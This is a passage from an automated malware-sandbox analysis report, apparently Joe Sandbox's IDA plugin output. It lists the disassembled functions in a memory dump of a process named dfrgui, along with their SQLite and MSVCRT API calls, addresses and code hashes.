sqlite3_mutex_enter.SQLITE3 ref: 61E1405F
sqlite3_mutex_leave.SQLITE3 ref: 61E14076
sqlite3_mutex_leave.SQLITE3 ref: 61E14161

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_leave$sqlite3_mutex_enter
String ID:
API String ID: 1664011779-0
Opcode ID: b192f551e3e578ebebc0e377da0636cb79909138fb335587068632203e2c4658
Instruction ID: f21d9ee3c2c968c78275151d9a9cec9f3249f2a502b75960652afa5f4052884c
Opcode Fuzzy Hash: b192f551e3e578ebebc0e377da0636cb79909138fb335587068632203e2c4658
Instruction Fuzzy Hash: E741FA75B042158BDF04CF99C4D159EBBF2AF98329B29C15ADC14AB309D734EC52CB61

Function 61E13ED7 Relevance: 6.1, APIs: 4, Instructions: 117COMMON

Download Yara Rule

APIs

sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000001,?,?,?,61E1D20A), ref: 61E13F01

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_free
String ID:
API String ID: 2313487548-0
Opcode ID: 4aeea763b7c664e8308b64a17888c4fc538e32a5699910ff5bf33884a41ec4dd
Instruction ID: 4b90c18073da3fac5196ec368c717e209574a621da64688acab0193ce7f567f7
Opcode Fuzzy Hash: 4aeea763b7c664e8308b64a17888c4fc538e32a5699910ff5bf33884a41ec4dd
Instruction Fuzzy Hash: 15414D76E186558FDB10DFBDD88629DBBF4BB89328F25843EE854A7308D734D8818B41

Function 61E48872 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

sqlite3_initialize.SQLITE3 ref: 61E4887E
sqlite3_mutex_enter.SQLITE3 ref: 61E488A0
sqlite3_vfs_find.SQLITE3 ref: 61E488D1
sqlite3_mutex_leave.SQLITE3 ref: 61E48A0B

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_vfs_find
String ID:
API String ID: 847843463-0
Opcode ID: 512421531ab6c2e8c369d9c434c3e0fe7dee2abefdfea279325efe142dec8cc4
Instruction ID: 0ff8dfe1d22df86b305b3c2e2c3e964dca3ea95c0db7723256d4f4df4c9729fe
Opcode Fuzzy Hash: 512421531ab6c2e8c369d9c434c3e0fe7dee2abefdfea279325efe142dec8cc4
Instruction Fuzzy Hash: 9141C534A18AE48FDB1ACBED98407D57FB1DB56708F188499C9DC4B342C234C589D791

Function 61EAD5DC Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

sqlite3_malloc64.SQLITE3 ref: 61EAD60C

Part of subcall function 61E36841: sqlite3_initialize.SQLITE3 ref: 61E3684C

sqlite3_mutex_enter.SQLITE3 ref: 61EAD66C
sqlite3_preupdate_hook.SQLITE3 ref: 61EAD683

Part of subcall function 61EAD483: sqlite3_mutex_enter.SQLITE3 ref: 61EAD494
Part of subcall function 61EAD483: sqlite3_mutex_leave.SQLITE3 ref: 61EAD4B7

sqlite3_mutex_leave.SQLITE3 ref: 61EAD694

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_initializesqlite3_malloc64sqlite3_preupdate_hook
String ID:
API String ID: 2514843837-0
Opcode ID: ce0a31f8decdc455c6a0a336d8b9e690fc310f2410db1bcd446ece998673c53b
Instruction ID: 35b8b0ba5fee3467ee1e0e488b342b255d232dcdda71c143365c90d7cf8f58a0
Opcode Fuzzy Hash: ce0a31f8decdc455c6a0a336d8b9e690fc310f2410db1bcd446ece998673c53b
Instruction Fuzzy Hash: B121CFB49042498FDB44DFA9C4C179ABBE5FB88314F20C96AEC488B345E775E841CB91

Function 61E1FD5E Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E1FD05
sqlite3_value_text16le.SQLITE3 ref: 61E1FD1D
sqlite3_value_text.SQLITE3 ref: 61E1FD2C
sqlite3_mutex_leave.SQLITE3 ref: 61E1FD4A

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_textsqlite3_value_text16le
String ID:
API String ID: 1617396527-0
Opcode ID: 1e1ecc307fc50bf7fef5240073daa22f2dfb2b6f63d17861e9b81f60a13fd8cc
Instruction ID: 11ef4c0e29919a0af2f585884683bf072a847af4aba68a45a0a2a21c02f92976
Opcode Fuzzy Hash: 1e1ecc307fc50bf7fef5240073daa22f2dfb2b6f63d17861e9b81f60a13fd8cc
Instruction Fuzzy Hash: A61193B46087058FC7049F78C4C176ABBF5EB49214F55C42ED8688B354D738E445CB81

Function 61E4660A Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E46622
sqlite3_mutex_leave.SQLITE3 ref: 61E4664A
sqlite3_mprintf.SQLITE3 ref: 61E4665B

Part of subcall function 61E42CCC: sqlite3_initialize.SQLITE3 ref: 61E42CD2
Part of subcall function 61E42CCC: sqlite3_vmprintf.SQLITE3 ref: 61E42CEC

sqlite3_create_function_v2.SQLITE3 ref: 61E466A0

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_create_function_v2sqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_mutex_leavesqlite3_vmprintf
String ID:
API String ID: 946922136-0
Opcode ID: 8743a3b45a114ad5f30a85a2ad250dd9d04031f2d09888b363a35748f29e1259
Instruction ID: 478d3a87db05b6d1348f93636e8525a425a279bf45ca494e8cc4e0c8d5f103c1
Opcode Fuzzy Hash: 8743a3b45a114ad5f30a85a2ad250dd9d04031f2d09888b363a35748f29e1259
Instruction Fuzzy Hash: 47112AB4A083428BD700DF69D48075EFBE5EFC8318F24C82DE8889B344C779D9458B92

Function 61EACC6D Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

sqlite3_initialize.SQLITE3 ref: 61EACC79
sqlite3_mutex_enter.SQLITE3 ref: 61EACC93
sqlite3_realloc64.SQLITE3 ref: 61EACCC8
sqlite3_mutex_leave.SQLITE3 ref: 61EACCF0

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_realloc64
String ID:
API String ID: 3457859928-0
Opcode ID: 7f6ecdd2d0bc5fad6ed7b0ca5670fa1c84d0549493841d5ca6f5a824c2962e15
Instruction ID: aa4632ce30e0139a3b547cc9489a6aa1c39690a079370795930c7b2027985aff
Opcode Fuzzy Hash: 7f6ecdd2d0bc5fad6ed7b0ca5670fa1c84d0549493841d5ca6f5a824c2962e15
Instruction Fuzzy Hash: 94014874708A519FDB04AFA9D8417197BE4FB8B34CF288439D599CB300E735E452C795

Function 61EAD6A8 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61EAD6BB
sqlite3_preupdate_hook.SQLITE3 ref: 61EAD6D3

Part of subcall function 61EAD483: sqlite3_mutex_enter.SQLITE3 ref: 61EAD494
Part of subcall function 61EAD483: sqlite3_mutex_leave.SQLITE3 ref: 61EAD4B7

sqlite3_preupdate_hook.SQLITE3 ref: 61EAD701
sqlite3_mutex_leave.SQLITE3 ref: 61EAD716

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_preupdate_hook
String ID:
API String ID: 289111692-0
Opcode ID: c0190277f504568cbaf5ea59a4c4c650a69f595082f9022047aea6566718b3f5
Instruction ID: d63f2b93aa6dfa5dfbdf16d89304dfc137027c7ea17f0d1f58b4ebe0c296d2b2
Opcode Fuzzy Hash: c0190277f504568cbaf5ea59a4c4c650a69f595082f9022047aea6566718b3f5
Instruction Fuzzy Hash: 0B1115789047459FD704DFA9C0C0A9ABBF4FF49258F60C859EC848F300D774E9818B81

Function 61EAF2A0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 61EAF2C5
__dllonexit.MSVCRT ref: 61EAF303
_unlock.MSVCRT ref: 61EAF333
_onexit.MSVCRT ref: 61EAF347

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: __dllonexit_lock_onexit_unlock
String ID:
API String ID: 209411981-0
Opcode ID: aa939c8326b5abbc3e7cf79e3e8b7fd16827cffc1bd0c0e4bedfd8840b84d71a
Instruction ID: 090d2defc32b22e089ef1dd89fbfa1ca48ad9282849c848a7f6e1166132f29fa
Opcode Fuzzy Hash: aa939c8326b5abbc3e7cf79e3e8b7fd16827cffc1bd0c0e4bedfd8840b84d71a
Instruction Fuzzy Hash: B51195B59197429FCB00EFB4D48451EBBE0AB85255F61892EE4E4CB351E738D4848B82

Function 61E0BF03 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

sqlite3_free.SQLITE3 ref: 61E0BF3B

Part of subcall function 61E0BD0E: sqlite3_free.SQLITE3 ref: 61E0BD2F

sqlite3_free.SQLITE3 ref: 61E0BF4E
sqlite3_free.SQLITE3 ref: 61E0BF30

Part of subcall function 61E0AE03: sqlite3_mutex_enter.SQLITE3 ref: 61E0AE22

sqlite3_free.SQLITE3 ref: 61E0BF74

Part of subcall function 61E0BED9: sqlite3_free.SQLITE3 ref: 61E0BEEA

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_free$sqlite3_mutex_enter
String ID:
API String ID: 3930042888-0
Opcode ID: 473f1b31b41bb17294361bd8dbb8f508885507f7cd7d21ae500b6cfdc97c6dd5
Instruction ID: 3445807af27b535089291217f01e13247fb180b73a293446973f27f06650c3a5
Opcode Fuzzy Hash: 473f1b31b41bb17294361bd8dbb8f508885507f7cd7d21ae500b6cfdc97c6dd5
Instruction Fuzzy Hash: D2012835D4464A8BCB00ABB9D8C4A5EB7F4FF8431AF60886DE4448B211D734E9A68B91

Function 61E1EA57 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

sqlite3_aggregate_context.SQLITE3 ref: 61E1EA6C
sqlite3_result_error.SQLITE3 ref: 61E1EA9C
sqlite3_result_double.SQLITE3 ref: 61E1EAB2
sqlite3_result_int64.SQLITE3 ref: 61E1EACA

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
String ID:
API String ID: 3779139978-0
Opcode ID: 295e61fc5695022acd2832214b4ac67bb99962b9d7ad623b1523afcfba9523b5
Instruction ID: 9bc1a1e98830a9c939ef6f28a834c4a3e082ef5a32e6de22bc37bbd7eabc9892
Opcode Fuzzy Hash: 295e61fc5695022acd2832214b4ac67bb99962b9d7ad623b1523afcfba9523b5
Instruction Fuzzy Hash: 7F0171B540CB819ED701AF65C58671ABFE4BF84318F2AC99DE4980B6A5C774C8C4C782

Function 61E35236 Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON

Download Yara Rule

APIs

sqlite3_initialize.SQLITE3(?,?,00000001,00000000,61ECC400,?,61E350C5), ref: 61E35244
sqlite3_mutex_enter.SQLITE3(?,?,00000001,00000000,61ECC400,?,61E350C5), ref: 61E3525C
strcmp.MSVCRT ref: 61E35279
sqlite3_mutex_leave.SQLITE3(?,?,00000001,00000000,61ECC400,?,61E350C5), ref: 61E3528A

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavestrcmp
String ID:
API String ID: 3985776146-0
Opcode ID: 0a68f110e75a4440ebab498708caa3437daea3d3a7f60c2ba1b8847a3fe10a9c
Instruction ID: 4fd56618683a5c20364d39c0074cd7fc8897ed2a2ddaeb90612b6ad0fab3da99
Opcode Fuzzy Hash: 0a68f110e75a4440ebab498708caa3437daea3d3a7f60c2ba1b8847a3fe10a9c
Instruction Fuzzy Hash: BEF062716097A14BD7006FE9948052ABBB8AFC1A5CF29843DE9448B301D731D811C7A1

Function 61EACCFF Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

sqlite3_initialize.SQLITE3 ref: 61EACD06
sqlite3_mutex_enter.SQLITE3 ref: 61EACD1E
sqlite3_free.SQLITE3 ref: 61EACD2B

Part of subcall function 61E0AE03: sqlite3_mutex_enter.SQLITE3 ref: 61E0AE22

sqlite3_mutex_leave.SQLITE3 ref: 61EACD47

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_initializesqlite3_mutex_leave
String ID:
API String ID: 1885817404-0
Opcode ID: 0c4c4ca87b5ddb5c345839d33eb9e4446115b6fc9c9357e4a0da65182b62cc06
Instruction ID: 2a3dd551eb61fb31ee52cd91c38f76d646a463acc14106144a268a435052d445
Opcode Fuzzy Hash: 0c4c4ca87b5ddb5c345839d33eb9e4446115b6fc9c9357e4a0da65182b62cc06
Instruction Fuzzy Hash: BFE0DFB06086428FDB003FF9D885309BBF8AB8230CF64443CD5888F300E779D09487A2

Function 61E298A5 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

sqlite3_free.SQLITE3 ref: 61E29A52

Part of subcall function 61E0AE03: sqlite3_mutex_enter.SQLITE3 ref: 61E0AE22

sqlite3_strnicmp.SQLITE3 ref: 61E29B3B

Strings

bua, xrefs: 61E29AF7

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_freesqlite3_mutex_entersqlite3_strnicmp
String ID: bua
API String ID: 541736041-3993766197
Opcode ID: 029ca704ef6e36e86599827080a8b89154677f28a70a5d1fe69678c2493d9a1e
Instruction ID: 80ce27050f425ef058bb90e575e6301ab00c5b6b6926a57c94f1f853dd67a822
Opcode Fuzzy Hash: 029ca704ef6e36e86599827080a8b89154677f28a70a5d1fe69678c2493d9a1e
Instruction Fuzzy Hash: 0CB1C274E05269DFDB04CFA8C590A9DBBF1BF88304F24D42AE899AB315D774E842CB41

Function 61E6B719 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

!, xrefs: 61E73B99
$va, xrefs: 61E73E4D

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID:
String ID: !$$va
API String ID: 0-3160857152
Opcode ID: c90c2e6ff35a4bee36501d6e714bb0dfd495fc428590a741b0cbc8e4548deae3
